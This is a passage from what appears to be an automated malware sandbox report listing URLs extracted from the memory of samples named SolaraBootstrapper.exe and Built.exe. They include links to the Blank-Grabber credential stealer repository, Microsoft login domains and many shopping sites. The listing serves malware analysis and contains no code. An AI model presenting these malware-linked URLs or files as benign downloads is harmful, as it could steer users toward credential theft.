                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_module
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_inde
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nod
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_session-resume_dist_index_js-node
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-85
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-55a9038b
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-e1
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Dialog_Dialog_js-no
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_e
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/wp-runtime-233f7e129770.js
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/favicons/favicon.png
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/favicons/favicon.svg
                        Source: Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2042088940.000001D5E4C3C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FCA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                        Source: Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FCA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                        Source: Built.exe, 00000003.00000002.2046197420.000001D5E525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                        Source: Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                        Source: Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                        Source: Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E5904000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2054526869.000001D5E5914000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                        Source: powershell.exe, 00000011.00000002.2033751444.00000269116F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1920822285.000001F310077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://partner.github.com
                        Source: Built.exe, 00000003.00000002.2042918246.000001D5E4D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
                        Source: Built.exe, 00000003.00000002.2066532868.00007FFDFB63B000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                        Source: Built.exe, 00000003.00000002.2050287577.000001D5E543E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
                        Source: Built.exe, 00000003.00000002.2042918246.000001D5E4D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngp
                        Source: Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
                        Source: Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, S l r .exe, 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, S l r .exe, 00000004.00000003.1715340990.000000000055D000.00000004.00000020.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000000.1711320937.00000000004F2000.00000002.00000001.01000000.00000010.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txtd
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://resources.github.com
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://resources.github.com/learn/pathways
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skills.github.com
                        Source: Built.exe, 00000003.00000003.1854557836.000001D5E5D10000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847371590.000001D5E5D08000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1848424250.000001D5E544C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872057238.000001D5E5D08000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847371590.000001D5E5D10000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847774640.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1832084743.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872057238.000001D5E5D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                        Source: Built.exe, 00000003.00000003.1847774640.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1832084743.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E53E1000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872409675.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872343443.000001D5E5498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: Built.exe, 00000003.00000003.1847333693.000001D5E551C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1848424250.000001D5E544C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1838072627.000001D5E54BA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847774640.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1832084743.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E543A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                        Source: Built.exe, 00000003.00000003.1848424250.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872343443.000001D5E5498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                        Source: Built.exe, 00000003.00000003.2038069954.000001D5E5463000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2035836310.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2030690846.000001D5E5D36000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2050418852.000001D5E5467000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                        Source: Built.exe, 00000003.00000002.2056924197.000001D5E5D12000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2032955728.000001D5E533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                        Source: Built.exe, 00000003.00000003.2038069954.000001D5E5463000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2035836310.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2030690846.000001D5E5D36000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2050418852.000001D5E5467000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                        Source: Built.exe, 00000003.00000002.2056924197.000001D5E5D12000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2032955728.000001D5E533B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                        Source: Built.exe, 00000003.00000003.1829183709.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1856705420.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2046197420.000001D5E525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                        Source: Built.exe, 00000003.00000002.2042088940.000001D5E4C3C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                        Source: Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                        Source: Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                        Source: Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://user-images.githubusercontent.com/
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E58B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
                        Source: Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
                        Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E58B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
                        Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
